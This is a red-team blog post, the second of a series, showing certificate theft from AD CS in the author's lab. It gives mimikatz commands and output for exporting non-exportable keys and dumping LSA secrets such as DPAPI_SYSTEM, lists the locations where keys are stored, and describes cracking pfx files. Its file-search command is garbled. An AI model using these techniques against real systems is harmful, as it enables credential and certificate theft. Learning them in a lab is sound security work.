I hope you’ve read the Part-1 of this blog series on basics of AD CS in the environment. In the Part-1 of this blog series, We looked at how we can setup certificate templates or uses the ‘User’ template to enroll our Windows 7 Minor User with AD CS services. So far we got our certificate enrolled and performed some enumerations using Certify and Certutil. In this part we are going to perform AD CS Certificate theft using following methods.
- Exporting Certificates Using Crypto APIs
- User Certificate Theft Via Data Protection API (DPAPI)
- Finding Certificate Files on Machine
It is indeed not an easy task to setup and have properly functioned AD CS environment in an organization. If the Enterprise CA exist than it might be possible that there will be some AD users or domain-joined computers that has the certificate issued to them with EKU permitting the domain authentication. Windows architecture stores the certificate as the “.pfx” (Personal Information Exchange) file. But sometimes this file contains the public certificate and private key. In a very few scenario where the private key is stored in a Trusted Platform Module (TPM Module). The Trusted Platform Module is designed to provide hardware security related function. In this case the private key will store on the hardware TPM module. However, not many organizations uses the TPM module to store the private key instead they use the default method where the private key get stored on the OS.
Windows machine uses the Data Protection Application Programming Interface (DPAPI) to protect the private key. I will write a blog on how to abuse the DPAPI Abuse later. DPAPI provides the set of API functions to encrypt or decrypt opaque data blobs using implicit crypto keys which is tied to the user or computer.
Exporting Certificates Using Crypto APIs
Let’s say you’re a red team consultant and found that certain windows machines in an environment allowed RDP session. You’ve obtained the successful RDP sessions. Now what? You would try to grab certificate along with it’s private key. The easiest way to do this is using certmgr.msc than click export.
Simply click Next and ‘Export the Password Protected’ .pfx file.
Checked the ‘Include all certificate in the certificate path if possible’ and ‘Export all extended properties’ and hit next.
The password can be anything.
Next is selecting the destination where you’d like to store your exported certificate.
Click Next and Finish.
you have now exported the user enrolled certificate.
This was possible because our private key is set to exportable on the certificate template. You can verify this settnig on AD CS server by using certtmpl.msc and checking the Cert Template properites.
However, In some cases, There will be a certificate templates for which the private keys are not exportable. So Microsoft’s CryptoAPI (CAPI) or Next Generation Cryptography API (CNG) will not allow you to export the certificate. In that case, we can Use the tool Mimikatz’s and we can try to achieve this goal. Let’s take a look at it. Previously, I have used a Certificate Template name ‘User’ for which the Private key Export was enabled. However, Now I’m going to request another certificate on Windows 7 machine using certmgr.msc. But I will enroll using a different Certificate Template named ‘Authenticated Sessions‘ for which the private key export is set to disabled. Here is my ‘Authenticated Session’ Certificate Template settings from AD CS server.
The Above Certificate template was created on the AD CS server with the private key export disabled. First we’re going to enroll using this certificate template on Windows 7 and then we’ll use Mimikatz to export the certificate pfx file.
‘Authenticated Sessions’ Certificate enrollment successful on Windows 7. So now I have two certificate with two different templates stored in my Windows 7 certificate store. One with Private key export disabled and one with enabled.
Now using mimikatz, I’m going to export both the certificate but remember the certificate with the User Template ‘Authenticated Session’ doesn’t have private key enabled. Here’s my mimikatz output from Windows 7 machine.
C:\Users\win7_minor_user\Downloads\mimikatz_trunk\x64>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # crypto::capi
Local CryptoAPI RSA CSP patched
Local CryptoAPI DSS CSP patched
mimikatz # crypto::certificates /export
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'
0. win7_minor_user
Subject : DC=lab, DC=vandan, CN=Users, CN=win7_minor_user
Issuer : DC=lab, DC=vandan, CN=vandan-WIN-VCOR12E8DFB-CA
Serial : 05000000000009a4077625f64b3a0500000012
Algorithm: 1.2.840.113549.1.1.1 (RSA)
Validity : 9/6/2023 3:27:12 AM -> 9/5/2024 3:27:12 AM
UPN : win7_minor_user@vandan.lab
Hash SHA1: bce49ed4be4483777a961d013d0923f61c4f78da
Key Container : ec8ab08aa6a19ca35e7afde951d3490a_0acd7c5f-0fc4-4160-9037-38bba4469df9
Provider : Microsoft Enhanced Cryptographic Provider v1.0
Provider type : RSA_FULL (1)
Type : AT_KEYEXCHANGE (0x00000001)
|Provider name : Microsoft Enhanced Cryptographic Provider v1.0
|Key Container : le-User-bec82f37-b722-4730-a4da-35ba5811f205
|Unique name : ec8ab08aa6a19ca35e7afde951d3490a_0acd7c5f-0fc4-4160-9037-38bba4469df9
|Implementation: CRYPT_IMPL_SOFTWARE ;
Algorithm : CALG_RSA_KEYX
Key size : 2048 (0x00000800)
Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
Exportable key : YES
Public export : OK - 'CURRENT_USER_My_0_win7_minor_user.der'
Private export : OK - 'CURRENT_USER_My_0_win7_minor_user.pfx'
1. win7_minor_user
Subject : DC=lab, DC=vandan, CN=Users, CN=win7_minor_user
Issuer : DC=lab, DC=vandan, CN=vandan-WIN-VCOR12E8DFB-CA
Serial : 060000000000de38b4751e101f940600000012
Algorithm: 1.2.840.113549.1.1.1 (RSA)
Validity : 9/11/2023 1:55:50 AM -> 9/10/2024 1:55:50 AM
UPN : win7_minor_user@vandan.lab
Hash SHA1: b6ed2b7795aed927f3459300bf5309bcc5046a99
Key Container : f104e880c64b6355bdc8931ec6ed72fc_0acd7c5f-0fc4-4160-9037-38bba4469df9
Provider : Microsoft Enhanced Cryptographic Provider v1.0
Provider type : RSA_FULL (1)
Type : AT_SIGNATURE (0x00000002)
|Provider name : Microsoft Enhanced Cryptographic Provider v1.0
|Key Container : le-ClientAuth-1a6a21d5-29ad-4dcd-9bc1-b23cffaae795
|Unique name : f104e880c64b6355bdc8931ec6ed72fc_0acd7c5f-0fc4-4160-9037-38bba4469df9
|Implementation: CRYPT_IMPL_SOFTWARE ;
Algorithm : CALG_RSA_SIGN
Key size : 2048 (0x00000800)
Key permissions: 0000003b ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
Exportable key : NO
Public export : OK - 'CURRENT_USER_My_1_win7_minor_user.der'
Private export : OK - 'CURRENT_USER_My_1_win7_minor_user.pfx'
mimikatz #Mimikatz’s “crypto::capi” command will be patch the CAPI to allow to export the private key in the current process. We’re going to take levarage of this command to extract the pfx file. Next, “crpto::certificates /export” command within mimikatz will export all the certificate along with the private key in a folder. The exported certificate filename for the ‘Authenticated Session’ Certificate template is CURRENT_USER_My_1_win7_minor_user.
in a real world scenario, Your beacon can run the tool like Mimikatz to grab the certificate from the target machine.
User Certificate Theft Via Data Protection API (DPAPI)
Windows stores certificate private key using DPAPI. Following are the list of locations where Microsoft stores the Private Keys. The Microsoft legacy CryptoAPI CSPs store private keys in the following directories.
| Key type | Directories |
| User private | %APPDATA%\Microsoft\Crypto\RSA\User SID\ %APPDATA%\Microsoft\Crypto\DSS\User SID\ |
| Local system private | %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\<SID>\ %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\DSS\<SID>\ |
| Local service Privatey | %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\<SID>\ %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\DSS\<SID>\ |
| Network service private | %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\S-1-5-20\ %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\DSS\S-1-5-20\ |
| Shared Private | %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\DSS\MachineKeys |
Next Generation Cryptography API (CNG) stores private keys in the following directories.
| Key type | Directories |
| User private | %APPDATA%\Microsoft\Crypto\Keys |
| Local system private | %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\SystemKeys |
| Local service Privatey | %WINDIR%\ServiceProfiles\LocalService |
| Network service private | %WINDIR%\ServiceProfiles\NetworkService |
| Shared Private | %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\Keys |
Windows most commonly stores the user certificate in the registry key HKCU\SOFTWARE\Microsoft\SystemCertificate. Although, in some cases, personal certifiate for the users are also stored in %APPDATA%\Microsoft\SystemCertificates\My\Certificates. The user private key located at %APPDATA%\Microsoft\Crypto\RSA\User SID\ for Microsoft’s CryptoAPI (DPAPI) and %APPDATA%\Microsoft\Crypto\Keys\ for CNG keys. Let me break down the structural link between the user certificate and private key
- The DPAPI masterkey needed to decrypt the private key. The DPAPI masterkey defines the user/machine GUID that needs to decrypt the private key.
- The Key Container Name aka ‘UniqueName’ of the private key. Microsoft Windows stores the certificate in a raw format along with salted values and metadata at the beginned of the certificate data. Either the unique name or the private key filename embedded in this metadata and is possibily the way to link the private key with the certificate.
In order to obtain the certificate with the private key, we can do the following steps.
- Identify which certificate you would like to steal from the certificate store and grab the key store name.
- Find the DPAPI masterkey needed to decrypt the private key.
- Grab the DPAPI masterkey and use it to decrypt the private key.
There are few ways to obtain the DPAPI masterkey. AD’s DPAPI backup key can decrypt any domain’s user masterkey. We can use mimikatz’s ‘dpapi:masterkey /in:”C:\Path_to_Key” /rpc‘ command to retrieve the account’s masterkey.
For modern operating system (not Win 7), you can use the following command to retrieve the masterkey using mimikatz. My Windows 7 was crashing when I ran this command and upon creating a process dump and analysing the memory pointers, I found that msvcrt.dll doesn’t allow mimikatz module to be load in the memory. Hence, I was not able to run the command.
dpapi::masterkey /in:"C:\Users\<<User_Name>>\AppData\Roaming\Microsoft\Crypto\RSA\<<SID>>\<<Key_File_Name>>" /sid:<<SID>> /password:<<Your_PWD>> /protectedHowever, while reading the research paper, I encountered the alternate option. The SharpDPAPI masterkeys command can dump the masterkey hash in John/Hashcat format. Use John or Hashcat to decrypt the masterkey.
Moreover, you can also steal the machine certificate using the DPAPI. Windows stores the machine certificate in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates and stores the private key for it at various locations. But the SharedDPAPI will search all the locations. One of the interesting location is %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys for CAPI and %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\Keys for CNG. These private keys are associated with the machine certificates and windows encrypts them using machine’s DPAPI masterkey. You can not decrypt these private keys using domain’s masterkey instead you will need DPAPI_SYSTEM LSA secret which is accessible only by the SYSTEM user. However, our favorite tool mimikatz can do this manually. You can use “lsadump::secrets” on windows OS to extract keys and decrypt machine’s masterkey.
mimikatz # lsadump::secrets
Domain : WIN-7-PRO
SysKey : 3048758ce65effc32d5323fa10e4b82e
Local name : WIN-7-PRO ( S-1-5-21-1424017625-418364820-1111148835 )
Domain name : VANDAN-DC ( S-1-5-21-1483006881-1570396664-4199689388 )
Domain FQDN : vandan.lab
Policy subsystem is : 1.11
LSA Key(s) : 1, default {595061de-c668-4d95-9e96-9e6bd30cbe4c}
[00] {595061de-c668-4d95-9e96-9e6bd30cbe4c} c1431628fdd18ab0617eee13ecfce6e77cfd45235de9ce8cafa2eeafa39ffe1a
Secret : $MACHINE.ACC
cur/text: ]v6+rok5/`$xlW8--OP"bzxcx]lsr/V7=C3!+T9TYe;d>/&XmE4tO+P:.SILaB^"qi_IF?'ce?I5tK'hHWFlp*MRO;61"rRdZC3>g2w pd/L(mx#Y*Cwl.3K
NTLM:0ccc892a1cf****************
SHA1:e698ec57d9ea80d8953d5a92a3c1d953c94df7aa
old/text: ]v6+rok5/`$xlW8--OP"bzxcx]lsr/V7=C3!+T9TYe;d>/&XmE4tO+P:.SILaB^"qi_IF?'ce?I5tK'hHWFlp*MRO;61"rRdZC3>g2w pd/L(mx#Y*Cwl.3K
NTLM:0ccc892a1cf*****************
SHA1:e698ec57d9ea80d8953d5a92a3c1d953c94df7aa
Secret : DefaultPassword
old/text: ***************
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 3a c4 07 27 0c 3c 2b a7 d0 6c 46 a5 1c 4d 2d bb 48 78 57 c4 f3 e7 a3 0c d0 46 ab fd fb e2 43 58 66 37 97 0c f7 e8 e6 5b
full: 3ac407270c3c2ba7d06c46a51c4d2dbb487857c4f3e7a30cd046abfdfbe243586637970cf7e8e65b
m/u : 3ac407270c3c2ba7d06c46a51c4d2dbb487857c4 / f3e7a30cd046abfdfbe243586637970cf7e8e65b
old/hex : 01 00 00 00 37 e8 8b b1 d4 c5 05 d8 90 64 8b 7d 45 38 85 3c 20 f8 5e 77 80 5e 7f 25 b2 fc dd 7d 22 33 6b 26 b5 53 0c ea 4e e4 f4 cc
full: 37e88bb1d4c505d890648b7d4538853c20f85e77805e7f25b2fcdd7d22336b26b5530cea4ee4f4cc
m/u : 37e88bb1d4c505d890648b7d4538853c20f85e77 / 805e7f25b2fcdd7d22336b26b5530cea4ee4f4cc
Secret : NL$KM
cur/hex : 17 63 d4 c2 ca b9 01 90 4b 88 be 74 38 19 01 5e c0 57 a1 21 b5 c8 16 92 a3 f0 bd 3f fa 0a 6e 88 87 8e bd 92 4f df 57 da b2 14 4f bb 6f ce b2 fe b
b eb cf 82 dc fe 11 ce 80 af ff 2e 07 f1 e5 42Notes the highlighted items in the code snap above.
With the SharedDPAPI certificate and /machine command you can automatically elevate to SYSTEM, dump the DPAPI_SYSTEM LSA secret, use it to decrypt and find machine DPAPI masterkeys, and use the key plaintext as a lookup table to decrypt any machine certificate private keys.
Finding Certificate Files on Machine
Other than looking into the System/User Store, there are chances that certificates or private keys are stored locally on the machine. Just like we export the certificates and stored in a user’s store. There are possibilities that the certificates are present somewhere on the machine. The most common type of certificates we have seen on Windows are .pfx, .p12, .pkcs12, .pem, .key, .cer, .crt, .csr, .keys, .keystore etc. One of the way to look for these files is using simple dir command on windows machine. ‘dir C:\ 20. (pfx|p12|cer)`$ false’ which will perform search for pfx,p12 and cer file extension upto 20 folders deep from C drive. If you find any PKCS12 file and if it is password protected than you can use pfx2john.py [https://fossies.org/dox/john-1.9.0-jumbo-1/pfx2john_8py_source.html] to extract the hash and than use JohnTheRipper to crack the hash. So what you would do if you get these certificates? Well, you can use it to authenticate to the target machine (Domain Controller) with a higher privileges. In the following section, I’m going to show you how you can list the Enhanced Key Usage (EKU) for our certificate using PowerShell from Windows 7.
So I have exported pfx file which allow me to authenticate to my domain with domain users rights. I’m going to use that certificate to list Enhanced Key Usage using PowerShell. You may find the certificates on a machine using the ‘dir’ command mentioned above. Once you get a certificate, one of the first thing you would need to check is the EKUs.
To conclude this second part, we’ve looked at ways with Mimikatz, SharpDPAPI and PowerShell to steal the certificate on the target machine. In a real world scenario, you will have beacon running on the target machine which gets this information to you however, there will be show stoppers which can break your beacon and you might lost the connection. As I’m doing it in my own lab, I focused more on OPSEC techniques.
In the next part we’re going to take a look at Account and Credentials theft.
Credits goes to where it’s due!
- https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
- https://ethicalchaos.dev/2020/10/04/attacking-smart-card-based-active-directory-networks/